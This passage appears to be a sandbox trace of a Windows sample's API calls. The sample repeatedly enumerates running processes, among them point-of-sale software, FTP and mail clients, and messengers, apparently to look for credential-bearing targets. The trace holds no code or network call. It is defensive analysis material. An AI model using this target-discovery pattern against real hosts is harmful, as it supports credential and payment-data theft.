szExeFile="omnipos.exe")) returned 1 [0295.018] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0295.020] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0295.022] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0295.025] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0295.035] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0295.038] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0295.040] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0295.046] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0295.048] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0295.051] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0295.053] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0295.056] Process32Next (in: hSnapshot=0x224c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0295.061] CloseHandle (hObject=0x224c) returned 1 [0295.061] Sleep (dwMilliseconds=0x64) [0295.328] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x227c [0295.341] Process32First (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.343] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0295.345] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0295.347] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0295.348] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0295.350] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0295.351] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0295.353] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0295.357] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0295.360] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.362] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.364] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0295.366] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.368] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.369] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.443] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.445] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.446] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.448] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.451] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0295.453] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0295.455] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0295.456] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.458] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0295.460] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0295.462] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0295.465] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0295.467] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0295.469] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0295.471] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0295.473] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0295.475] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0295.477] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0295.478] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0295.629] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0295.631] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0295.632] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0295.634] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0295.637] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0295.639] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0295.641] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0295.643] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0295.644] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0295.646] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0295.648] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0295.649] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0295.651] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0295.654] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0295.656] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0295.658] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0295.659] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0295.661] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0295.663] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0295.664] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0295.751] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0295.753] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0295.755] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0295.756] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0295.759] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0295.761] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0295.764] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0295.766] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0295.768] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0295.770] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0295.772] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0295.774] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0295.776] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0295.779] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0295.781] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0295.783] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0295.785] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0295.787] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 